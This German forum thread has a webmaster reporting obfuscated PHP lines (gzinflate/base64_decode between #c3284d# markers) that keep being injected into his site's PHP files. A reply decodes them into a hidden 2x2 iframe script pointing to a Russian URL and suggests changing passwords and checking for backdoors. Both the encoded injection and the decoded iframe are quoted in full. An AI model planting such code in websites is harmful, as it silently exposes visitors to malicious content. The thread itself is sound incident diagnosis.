Komische scriptzeilen in meinem Quellcode

[dreggert]

Hallo mir ist in letzter Zeit aufgefallen, dass auf meinem Webserver meine Quellcodedateien ohne mein zutun angepasst worden sind.

In diversen Index.php und anderen PHP Dateien habe ich folgende Zeilen gefunden:

#c3284d#
echo(gzinflate(base64_decode("JY5BDoIwFET3JNyh+Rt0Q6MLF9rWS3iBWmr7DbTk8xG5vUV2k8nMm1GTIxxZ8Dp6Dey/LN/2Y3cXTF112c2DT9wuhOwPjcIX2cGLiZyGyDxepbScB7Q98trSLDG1LuD9dAGRSlLDY0FmTyAKNfc9pqDBzpxB/FHPTJ0nDakYBRKSBlcGt0L0GCJrOINYsOO4KaPkfsE0x1tdKbl/NT8=")));
#/c3284d#

Ich habe diese letzte Woche aus jedem einzelnen Quelltext entfernt. Heute habe ich wieder etwas an meiner Webseite angepasst und diese Zeilen sind wieder in diversen Dateien vorhanden.

Kann einer mit dem was anfangen?

 

[Yaslaw]

Dein Account ist gehackt ausser du hast einen russischen Provider.
Ich habe mal gzinflate(base64_decode()) auf den String getest.
Es wird ein Javascript generiert das iframe zu einer Russischen Seite erstellt.

<script type="text/javascript">
document.write('<iframe src="http://atomiality.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>

Hast du schon mal dein Passwort geändert? Die Berechtigungen auf den Ordnern kontrolliert? Dein Code kontrolliert ob da keine Hintertür offen ist?

 

[dreggert]

Passwort habe ich jetzt geändert. Mir ist es auf Arbeit aufgefallen und da konnte ich nicht auf die Konfigseite zugreifen. Habe soweit alle verdächtigen texte gelöscht. Hoffe das bleibt nun auch so.